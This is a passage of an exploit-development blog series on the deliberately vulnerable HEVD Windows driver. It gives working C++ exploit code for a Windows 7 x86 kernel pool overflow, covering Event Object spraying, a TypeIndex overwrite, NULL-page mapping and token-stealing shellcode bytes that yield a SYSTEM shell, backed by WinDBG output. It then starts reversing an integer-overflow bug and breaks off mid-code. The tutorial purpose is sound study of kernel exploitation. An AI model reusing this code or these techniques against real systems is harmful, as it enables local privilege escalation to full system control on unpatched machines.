    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

Take note that we’re storing the handles to each Event Object in a vector so that we can access those later.

Let’s spray our objects, then allocate our kernel buffer and see what the page our kernel buffer ends up on looks like. We still have the same breakpoint from before, right after the memcpy operation. At this point the kernel buffer pointer is still in eax, don’t forget, so I just subtract 0x1000 from it (a small page size) and plug that right into the !pool command to get the whole page’s allocation information:

kd> !pool 8628b008-0x1000
Pool page 8628a008 region is Nonpaged pool
*8628a000 size:   40 previous size:    0  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 8628a040 size:   80 previous size:   40  (Free)       b.2.
 8628a0c0 size:   40 previous size:   80  (Allocated)  Even (Protected)
 8628a100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a180 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a1c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a200 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a240 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a280 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a2c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a3c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a4c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a5c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a680 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a6c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a7c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a8c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a9c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628abc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628acc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628adc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628afc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

That looks pretty nice. We get a nice contiguous block of Event Objects just as we expected (bit weird that there’s a 0x80 byte hole in there…).

The next thing we need to do is examine the constituent parts of these Event Objects to find our overwrite target. I like to take a look at the memory pane and then, following along with the cited blogposts, parse out the meaning of the byte values. Here is the memory view for one of the Event Object allocations:

8628afc0 08 00 08 04 45 76 65 ee 00 00 00 00 40 00 00 00  ....Eve.....@...
8628afd0 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00  ................
8628afe0 00 00 00 00 0c 00 08 00 40 f9 37 86 00 00 00 00  ........@.7.....
8628aff0 01 00 04 34 00 00 00 00 f8 af 28 86 f8 af 28 86

We can start parsing this by taking a look at the pool header:

kd> dt nt!_POOL_HEADER 8628afc0 
   +0x000 PreviousSize     : 0y000001000 (0x8)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001000 (0x8)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4080008
   +0x004 PoolTag          : 0xee657645
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65

This looks pretty similar to what we saw before; obviously the PoolTag is different, but so is the Ulong1 value, and you can examine the binary constituent parts that lead to its formulation. Next we’ll look at the OBJECT_HEADER_QUOTA_INFO, which starts at offset 0x8 from the beginning of our allocation, and you can match it up with the bytes in the memory view:

kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 8628afc0+0x8
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null) 

So far, none of these things can be changed by our overwrite. Our overwrite has to keep all of this data intact so we’ll have to write these values into our input buffer. Next, we’ll finally start to approach our overwrite target when we parse out the OBJECT_HEADER:

kd> dt nt!_OBJECT_HEADER 8628afc0 + 8 + 10
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8637f940 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8637f940 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

This is where things start to get interesting, as the TypeIndex value right now is set to 0xc. 0xc is actually an array index, like array[0xc]. This array is called the ObTypeIndexTable and it is filled with pointers to OBJECT_TYPE structures. This is actually really cool in my opinion because we can test this out. Let’s first dump all the pointers stored in the ObTypeIndexTable.

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
82997770  84f46598 84fedf48 84fede08 84fedd40
82997780  84fedc78 84fedbb0 84fedae8 84fed410
82997790  85053520 8504f9c8 8504f900 8504f838
829977a0  8503f9c8 8503f900 8503f838 84ffb9c8
829977b0  84ffb900 84ffb838 84fef780 84fef6b8
829977c0  84fef5f0 8503b838 8503b770 8503b6a8
829977d0  85057590 850573a0 84ff3ca0 84ff3bd8

If the first entry (at 82997760) is array index 0, then index 0xc is going to be the value at 82997760 + 0xc * 4 = 82997790, which is 85053520. Let’s get WinDBG to spill the beans on this type and see if it’s indeed an Event Object.

kd> dt nt!_OBJECT_TYPE 85053520 -b
   +0x000 TypeList         : _LIST_ENTRY [ 0x85053520 - 0x85053520 ]
      +0x000 Flink            : 0x85053520 
      +0x004 Blink            : 0x85053520 
   +0x008 Name             : _UNICODE_STRING "Event"
      +0x000 Length           : 0xa
      +0x002 MaximumLength    : 0xc
      +0x004 Buffer           : 0x8ba06838  "Event"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x6bbf
   +0x01c TotalNumberOfHandles : 0x6c2b
   +0x020 HighWaterNumberOfObjects : 0x6bbf
   +0x024 HighWaterNumberOfHandles : 0x6c2b
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
      +0x000 Length           : 0x50
      +0x002 ObjectTypeFlags  : 0 ''
      +0x002 CaseInsensitive  : 0y0
      +0x002 UnnamedObjectsOnly : 0y0
      +0x002 UseDefaultObject : 0y0
      +0x002 SecurityRequired : 0y0
      +0x002 MaintainHandleCount : 0y0
      +0x002 MaintainTypeList : 0y0
      +0x002 SupportsObjectCallbacks : 0y0
      +0x002 CacheAligned     : 0y0
      +0x004 ObjectTypeCode   : 2
      +0x008 InvalidAttributes : 0x100
      +0x00c GenericMapping   : _GENERIC_MAPPING
         +0x000 GenericRead      : 0x20001
         +0x004 GenericWrite     : 0x20002
         +0x008 GenericExecute   : 0x120000
         +0x00c GenericAll       : 0x1f0003
      +0x01c ValidAccessMask  : 0x1f0003
      +0x020 RetainAccess     : 0
      +0x024 PoolType         : 0 ( NonPagedPool )
      +0x028 DefaultPagedPoolCharge : 0
      +0x02c DefaultNonPagedPoolCharge : 0x40
      +0x030 DumpProcedure    : (null) 
      +0x034 OpenProcedure    : (null) 
      +0x038 CloseProcedure   : (null) 
      +0x03c DeleteProcedure  : (null) 
      +0x040 ParseProcedure   : (null) 
      +0x044 SecurityProcedure : 0x82abad90 
      +0x048 QueryNameProcedure : (null) 
      +0x04c OkayToCloseProcedure : (null) 
   +0x078 TypeLock         : _EX_PUSH_LOCK
      +0x000 Locked           : 0y0
      +0x000 Waiting          : 0y0
      +0x000 Waking           : 0y0
      +0x000 MultipleShared   : 0y0
      +0x000 Shared           : 0y0000000000000000000000000000 (0)
      +0x000 Value            : 0
      +0x000 Ptr              : (null) 
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x850535a0 - 0x850535a0 ]
      +0x000 Flink            : 0x850535a0 
      +0x004 Blink            : 0x850535a0 

Using the -b option here really saves us because it displays all levels of sub-structures within their parent structures. So, we have absolutely honed in on the pointer to the Event object type, as evidenced by this:

+0x008 Name             : _UNICODE_STRING "Event"

What gets cool here is that at offset 0x28 we see the TypeInfo structure. One of its members, the CloseProcedure, is 0x38 deep into that TypeInfo structure. So starting from offset 0x0 of the OBJECT_TYPE structure we found in the table, the CloseProcedure is located at offset 0x28 + 0x38, or 0x60. THIS is the function pointer that is called when we use the CloseHandle API to free these Event Objects from the non-paged pool. So this is our target.

If that is complicated I’ve tried to create a helpful diagram:

So what happens when we free the chunk with CloseHandle is that the kernel goes to the address stored at array index 0xc, looks at offset 0x60 from there for a function pointer, and calls that function. Looking back at that table:

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
----SNIP----

The first entry is 0x00000000, and we already know from our NULL pointer dereference exploit that we can map the NULL page on Windows 7 x86. So thanks to the aforementioned bloggers, our path forward is clear. We’ll ONLY corrupt the value 0xc inside the OBJECT_HEADER so that it’s set to 0x0 instead; we’ll leave everything else the way it is with our overwrite. This way, when we free this chunk, the kernel will look at offset 0x60 from 0x00000000 for a function pointer. So we’ll just map the NULL page and place a pointer to our shellcode at offset 0x60.
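
Put another way: once the NULL page is mapped, all the final exploit has to do is drop a pointer to the shellcode at offset 0x60 (0x28 for TypeInfo plus 0x38 for CloseProcedure). Something like this sketch, where shellcode_ptr is a hypothetical pointer to our payload buffer:

// With the NULL page mapped, offset 0x60 is where the kernel will look for the
// fake OBJECT_TYPE's TypeInfo.CloseProcedure when our corrupted chunk is freed.
*(PVOID*)0x60 = shellcode_ptr;  // hypothetical pointer to our shellcode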

Executing The Plan

Now that we know our plan of attack, we need to execute it.

The adjustment we need to make is to poke holes in this contiguous block so that when we get our buffer allocated the allocator slides it right between Event Objects. We know that it takes 8 Event Objects being freed to make a 0x200-sized hole, so following along with @FuzzySec, we’ll release 8 Event Object handles every 0x16 handles in our vector. Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x200 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i = i + 0x16) {
        for (int x = 0; x < 8; x++) {
            BOOL freed = CloseHandle(sequential_handles[i + x]);
            if (freed == false) {
                cout << "[!] Unable to free sequential allocation!\n";
                cout << "[!] Last error: " << GetLastError() << "\n";
            }
        }
    }
    cout << "[>] Holes poked lol.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

After running it and looking up our post memcpy kernel buffer with the !pool command, we see that our 0x200 byte object was allocated precisely between two Event Objects! Everything is working as planned!

kd> !pool 862740c8
Pool page 862740c8 region is Nonpaged pool
 86274000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 86274040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274080 size:   40 previous size:   40  (Allocated)  Even (Protected)
*862740c0 size:  200 previous size:   40  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 862742c0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862743c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862744c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862745c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274640 size:  200 previous size:   40  (Free)       Even
 86274840 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862748c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862749c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274bc0 size:  200 previous size:   40  (Free)       Even
 86274dc0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274e00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274fc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

Memory Corruption Engaged

Now that we can control the pool to a predictable degree, it’s time to overwrite that type index and change it from 0xc to 0x0. Everything else in between our 0x200 allocation and this byte needs to remain the same or we’ll get a BSOD.

Let’s use the dd command to dump some DWORD values from the beginning of the Event Object right after our kernel buffer. Comparing this with the memory pane view of an Event Object from earlier, you can see how I formulate the input buffer in the exploit code.

kd> dd 8627e780 
8627e780  04080040 ee657645 00000000 00000040
8627e790  00000000 00000000 00000001 00000001
8627e7a0  00000000 0008000c 8637f940 00000000
----SNIP----

Right. So we need to keep everything but the 0xc byte intact and overwrite that single byte with 0x0. Looks like we’re overwriting 40 (0x28) bytes in total, which gives us an input buffer size of 0x220. We’ll make an overwrite_payload variable that is a byte buffer, and we’ll copy it into the last 0x28 bytes of a 0x220-sized buffer, with our original \x42 values taking up the first 0x1F8 bytes as follows:

 ULONG payload_len = 0x220;

    BYTE* input_buff = (BYTE*)VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    BYTE overwrite_payload[] = (
        "\x40\x00\x08\x04"  // pool header
        "\x45\x76\x65\xee"  // pool tag
        "\x00\x00\x00\x00"  // obj header quota begin
        "\x40\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x00\x00"  // obj header quota end
        "\x01\x00\x00\x00"  // obj header begin
        "\x01\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x08\x00" // 0xc converted to 0x0
        );

    memset(input_buff, '\x42', 0x1F8);
    memcpy(input_buff + 0x1F8, overwrite_payload, 0x28);

We’ll also want to allocate the NULL page, which I pulled directly from tekwizz123.
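
The snippet below assumes a _NtAllocateVirtualMemory function-pointer typedef resolved out of ntdll with GetProcAddress (the same trick used for NtAllocateReserveObject in the UAF post); the full exploit presumably defines something like the standard native prototype:

typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect);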

void allocate_shellcode() {

    _NtAllocateVirtualMemory NtAllocateVirtualMemory = 
        (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateVirtualMemory");

    INT64 address = 0x1;
    int size = 0x100;

    HANDLE result = (HANDLE)NtAllocateVirtualMemory(
        GetCurrentProcess(),
        (PVOID*)&address,
        NULL,
        (PSIZE_T)&size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (result == INVALID_HANDLE_VALUE) {
        cout << "[!] Unable to allocate NULL page...wtf?\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] NULL page mapped.\n";
    cout << "[>] Putting 'AAAA' on NULL page...\n";

    memset((void*)0x0, '\x41', 0x100);

}
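One thing not shown in this snippet is the _NtAllocateVirtualMemory function pointer type used for the GetProcAddress cast. A minimal typedef matching the call above, based on the standard ntdll prototype, would look something like this:

// assumed typedef for the NtAllocateVirtualMemory call above;
// NTSTATUS and NTAPI come from <winternl.h>
typedef NTSTATUS(NTAPI* _NtAllocateVirtualMemory)(
    HANDLE    ProcessHandle,
    PVOID*    BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T   RegionSize,
    ULONG     AllocationType,
    ULONG     Protect);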

I’ll also fill the NULL page with pure \x41 values so that when we run this code, we should get an Access Violation exception with an eip value of 41414141.

Last but not least, we have to free our chunks so that the CloseProcedure is activated!

void free_chunks() {

    cout << "[>] Freeing defragmentation allocations...\n";
    for (int i = 0; i < defragment_handles.size(); i++) {

        BOOL freed = CloseHandle(defragment_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Defragmentation allocations freed.\n";
    cout << "[>] Freeing sequential allocations...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {

        BOOL freed = CloseHandle(sequential_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free sequential allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Sequential allocations freed.\n";
}

We run this code and what happens??

Access violation - code c0000005 (!!! second chance !!!)
41414141 ??              ???

We did it!!

You can examine the pool allocations too. Look at the pool allocation right after our kernel buffer. We’ve replaced 0xc with 0x0, and you can see how it differs from the next Event Object; I’ve marked both with asterisks.

855b8af8 42 42 42 42 42 42 42 42 40 00 08 04 45 76 65 ee  BBBBBBBB@...Eve.
855b8b08 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b18 01 00 00 00 01 00 00 00 00 00 00 00 *00* 00 08 00  ................
855b8b28 80 82 14 85 00 00 00 00 01 00 04 00 00 00 00 00  ................
855b8b38 38 8b 5b 85 38 8b 5b 85 08 00 08 04 45 76 65 ee  8.[.8.[.....Eve.
855b8b48 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b58 01 00 00 00 01 00 00 00 00 00 00 00 *0c* 00 08 00  ................

Now let’s just allocate some shellcode there…

Shellcode Implementation

We’re going to first use our shellcode from our Uninit Stack Variable exploit and see how far that gets us:

char Shellcode[] = (
		"\x60"
		"\x64\xA1\x24\x01\x00\x00"
		"\x8B\x40\x50"
		"\x89\xC1"
		"\x8B\x98\xF8\x00\x00\x00"
		"\xBA\x04\x00\x00\x00"
		"\x8B\x80\xB8\x00\x00\x00"
		"\x2D\xB8\x00\x00\x00"
		"\x39\x90\xB4\x00\x00\x00"
		"\x75\xED"
		"\x8B\x90\xF8\x00\x00\x00"
		"\x89\x91\xF8\x00\x00\x00"
		"\x61"
		"\xC3"
		);

These are my breakpoints right now:

kd> bp !HEVD+4D64
kd> ba r1 0x60
kd> bl
 0 e 8c295d64     0001 (0001) HEVD!TriggerNonPagedPoolOverflow+0xe6
 1 e 00000060 r 1 0001 (0001) 

Here is the disassembly pane after we hit our access breakpoint a few times (remember that that address will be accessed multiple times during our exploit). You can see we’re calling a function located at edi + 0x60 when edi is set to 0. So, this is our shellcode we’re about to run:

Here is the call stack:

We can see in the memory pane that we’re pushing 4 DWORDs onto the stack setting up our call to dword ptr [esp+0x60] which we would need to clean up in our subroutine (shellcode). So our shellcode will end with a ret 0x10 instruction to compensate.
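As a quick sketch, that only changes the tail of the shellcode: the popad stays, and the plain ret (\xC3) becomes the 3-byte ret 0x10 encoding so the 4 pushed DWORDs get cleaned up on return:

// tail of the shellcode only -- everything before popad stays the same
"\x61"          // popad
"\xc2\x10\x00"  // ret 0x10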

Getting an nt authority/system shell:

Full exploit code: here

Conclusion

That was a really fun one. Thanks again to the aforementioned authors and exploit writers. Even though this exploit vector involved some relatively old techniques, it was still fun for me and I learned a lot just about memory management in general and got some more experience in WinDBG. Until next time!

HEVD Exploits – Windows 7 x86 Integer Overflow

By: h0mbre
20 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

Thanks to @tekwizz123, I used his method of setting up the exploit buffer for the most part as the Windows macros I was using weren’t working (obviously user error.)

Integer Overflow

This was a really interesting bug to me. Generically, the bug is when you have some arithmetic in your code that allows for unintended behavior. The bug in question here involved incrementing a DWORD value that was set to 0xFFFFFFFF, which overflows the integer size and wraps the value around back to 0x00000000. If you add 0x4 to 0xFFFFFFFF, you get 0x100000003. However, this value no longer fits in the 32 bits of a DWORD, so we lose the leading 1 and we’re back down to 0x00000003. Here is a small demo program:

#include <iostream>
#include <Windows.h>

int main() {

	DWORD var1 = 0xFFFFFFFF;
	DWORD var2 = var1 + 0x4;

	std::cout << ">> Variable One is: " << std::hex << var1 << "\n";
	std::cout << ">> Variable Two is: " << std::hex << var2 << "\n";
}

Here is the output:

>> Variable One is: ffffffff
>> Variable Two is: 3

I actually learned about this concept from Gynvael Coldwind’s stream on fuzzing. I also found the bug in my own code for an exploit on a real vulnerability I will hopefully be doing a write-up for soon (when the CVE gets published.) Now that we know how the bug occurs, let’s go find the bug in the driver in IDA and figure out how we can take advantage.

Reversing the Function

With the benefit of the comments I made in IDA, we can kind of see how this works. I’ve annotated where everything is after stepping through in WinDBG.

The first thing we notice here is that ebx gets loaded with the length of our input buffer in DeviceIoControl when we do this operation here: mov ebx, [ebp+Size]. This is kind of obvious, but I hadn’t really given it much thought before. We allocate an input buffer in our code, usually it’s a character or byte array, and then we usually satisfy the DWORD nInBufferSize parameter by doing something like sizeof(input_buffer) or sizeof(input_buffer) - 1 because we actually want it to be accurate. Later, we might actually lie a little bit here.

Now that ebx is the length of our input buffer, we see that it gets 0x4 added to it and the result is loaded into eax. If we had an input buffer of 0x7FC, adding 0x4 to it would make it 0x800. A really important thing to note here is that we’ve essentially created a new length variable in eax and kept our old one in ebx intact. In this case, eax would be 0x800 and ebx would still hold 0x7FC.

Next, eax is compared to esi, which we can see holds 0x800. If eax is equal to or more than 0x800, we take the red path down to the Invalid UserBuffer Size debug message. We don’t want that. We need to satisfy this jbe condition.

If we satisfy the jbe condition, we branch down to loc_149A5. We put our buffer length from ebx into eax and then we effectively divide it by 4 since we do a bit shift right of 2. We compare this quotient to edi, which was zeroed out previously and has remained unchanged up until now. If the counter in edi is the same or more than the length/4 quotient, we move to loc_149F1 where we will end up exiting the function soon after. Right now, since our quotient is more than edi, we’ll jump to mov eax, [ebp+8].

This series of operations is actually the interesting part. eax is given a pointer to our input buffer and we compare the value there with 0xBAD0B0B0. If they are the same value, we move towards exiting the function. So far we have identified two conditions where we’ll exit the function: if edi is ever equal to or more than the length of our input buffer divided by 4, OR if the 4 byte value located at [ebp+8] is equal to 0xBAD0B0B0.

Let’s move on to the final puzzle piece. mov [ebp+edi*4+KernelBuffer], eax is kind of convoluted looking, but what it’s doing is placing the 4 byte value in eax into the kernel buffer at index edi * 0x4. Right now, edi is 0, so it’s placing the 4 byte value right at the beginning of the kernel buffer. After this, the dword ptr value at ebp+8 is incremented by 0x4. This is interesting because we already know that ebp+0x8 is where the pointer to our input buffer lives. So now that we’ve placed the first four bytes from our input buffer into the kernel buffer, we move on to the next 4 bytes. We also see that edi is incremented, and we now understand what is taking place.

As long as:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0xBAD0B0B0,

we will copy 4 bytes of our input buffer into the kernel buffer and then move onto the next 4 bytes in the input buffer to test criteria 2 and 3 again.

There can’t really be a problem with copying bytes from the user buffer into the kernel buffer unless somehow the copying exceeds the space allocated in the kernel buffer. If that occurs, we’ll begin overwriting adjacent memory with our user buffer. How can we fool this length + 0x4 check?
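Before we go fool anything, here is a rough C-style sketch of the logic we just reversed (the variable names and the exact comparison are my own reconstruction, not HEVD’s actual source), just to make the arithmetic easy to see:

#include <Windows.h>

// rough reconstruction of the reversed routine above; names are assumptions
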